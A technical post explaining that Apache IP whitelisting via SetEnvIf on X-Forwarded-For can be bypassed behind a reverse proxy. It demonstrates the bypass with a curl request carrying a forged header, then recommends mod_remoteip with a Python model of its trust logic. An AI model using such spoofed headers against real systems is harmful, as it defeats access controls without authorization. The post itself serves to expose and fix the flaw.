Bypass mod_access when using a reverse proxy and X-Forwarded-For
If you intend to use a reverse proxy in front of an Apache web server, the IP address seen by Apache is that of the reverse proxy.
This breaks Apache's IP-based access rules (for instance `allow from 88.233.222.106`).
A commonly proposed solution to this problem is a `SetEnvIf` directive.
In practice, this solution is not secure, because a malicious user can easily craft a request carrying such a header.
For instance, here is the Apache configuration for a protected directory:
<Directory /path/to/protected/>
SetEnvIf X-Forwarded-For ^234\.22\.11\.6 trusted_from
allow from env=trusted_from
</Directory>
And here is a shell session using curl to prove it works:
~ $ curl -I http://myurl/protected/
HTTP/1.1 403 Forbidden
Server: nginx/1.2.1
Date: Tue, 01 Dec 2013 20:39:25 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
~ $ curl -H 'X-Forwarded-For: 234.22.11.6' -I http://myurl/protected/
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Tue, 01 Dec 2013 20:39:27 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
You may argue that you still have to know the allowed IP. This is true, but the source address no longer comes from the TCP connection; it comes from a (potentially) untrusted header.
rpaf is not an option, because it only works for log files.
Apache 2.4, however, includes mod_remoteip, which works like a charm. For Apache 2.2 users, a GitHub project has ported this module to Apache 2.2.
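As an added example (not code from the original post), here is the page's SetEnvIf rule written next to the trust logic mod_remoteip applies (RemoteIPHeader X-Forwarded-For plus RemoteIPInternalProxy), so both can be checked against sample requests. The proxy address 10.0.0.1 and the attacker address 203.0.113.9 are constructed values, and the example assumes the proxy appends the real peer address to the header, as nginx does with $proxy_add_x_forwarded_for.

```python
import ipaddress

# Whitelisted client address from the post's configuration.
ALLOWED_CLIENT = "234.22.11.6"
# Constructed address of the reverse proxy that sits in front of Apache.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.1/32")]


def setenvif_allows(xff_header: str) -> bool:
    """Mimic `SetEnvIf X-Forwarded-For ^234\\.22\\.11\\.6 trusted_from`.

    The decision rests solely on the raw header text, which any client
    can send; the TCP peer address plays no part in it.
    """
    return xff_header.startswith(ALLOWED_CLIENT)


def _is_trusted_proxy(addr: str) -> bool:
    """True if addr falls inside a RemoteIPInternalProxy network."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False  # garbage in the header is never a trusted hop
    return any(ip in net for net in TRUSTED_PROXIES)


def remoteip_client(peer_addr: str, xff_header: str) -> str:
    """Derive the client address the way mod_remoteip does.

    Start from the TCP peer and step back through the X-Forwarded-For
    list (rightmost entry first) only while the current hop is a trusted
    proxy. A header sent by an untrusted peer is ignored entirely.
    """
    hops = [h.strip() for h in xff_header.split(",") if h.strip()]
    remote = peer_addr
    while hops and _is_trusted_proxy(remote):
        remote = hops.pop()  # the trusted hop appended this entry
    return remote


def remoteip_allows(peer_addr: str, xff_header: str) -> bool:
    """Equivalent of `Require ip 234.22.11.6` once mod_remoteip has run."""
    return remoteip_client(peer_addr, xff_header) == ALLOWED_CLIENT
```

Note that if the proxy forwards a client-supplied X-Forwarded-For verbatim instead of appending its peer address, mod_remoteip sees the spoofed entry as the last hop and the bypass returns, so the proxy side of the configuration matters as much as the Apache side.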